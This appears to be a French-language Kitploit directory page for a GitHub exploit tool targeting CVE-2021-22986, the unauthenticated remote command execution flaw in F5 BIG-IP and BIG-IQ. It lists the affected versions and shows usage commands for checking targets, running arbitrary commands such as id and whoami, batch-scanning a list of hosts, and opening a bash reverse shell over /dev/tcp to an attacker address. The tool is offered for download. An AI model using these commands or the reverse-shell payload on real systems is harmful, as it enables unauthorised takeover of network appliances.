Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-22986 — CVE-2021-22986 & F5 BIG-IP RCE | Kitploit
Outils/GitHubGitHub/al1ex/cve-2021-22986
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubal1ex/cve-2021-22986

CVE-2021-22986

CVE-2021-22986 & F5 BIG-IP RCE

Voir le dépôt
9129il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Impact de la vulnérabilité

Cette vulnérabilité permet à des attaquants non authentifiés ayant un accès réseau à l'interface REST iControl, via l'interface de gestion BIG-IP et les adresses IP self, d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers, et de désactiver des services. Cette vulnérabilité ne peut être exploitée qu'à travers le plan de contrôle et ne peut pas l'être via le plan de données. L'exploitation peut mener à un compromis complet du système. Le système BIG-IP en mode Appliance est également vulnérable.

Produit vulnérable

  • F5 BIG-IQ 6.0.0-6.1.0
  • F5 BIG-IQ 7.0.0-7.0.0.1
  • F5 BIG-IQ 7.1.0-7.1.0.2
  • F5 BIG-IP 12.1.0-12.1.5.2
  • F5 BIG-IP 13.1.0-13.1.3.5
  • F5 BIG-IP 14.1.0-14.1.3.1
  • F5 BIG-IP 15.1.0-15.1.2
  • F5 BIG-IP 16.0.0-16.0.1

Vérification de vulnérabilité

Utilisation de base

root@kitploit:~
python3 CVE_2021_22986.py

use

Vérification de vulnérabilité

root@kitploit:~
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

verify

Exécution de commande :

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

command_exec

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

exec_2

Scan par lots

root@kitploit:~
python3 CVE_2021_22986.py -s true -f check.txt

batch_scan

Reserve Shell

root@kitploit:~
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

reverse_shell

reverse_shell_ok

Nouveau POC

root@kitploit:~
python3 newpoc.py https://192.168.174.164

newpoc

Références

https://support.f5.com/csp/article/K03009991

https://github.com/safesword/F5_RCE

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

https://github.com/Udyz/CVE-2021-22986-SSRF2RCE

Télécharger l’outil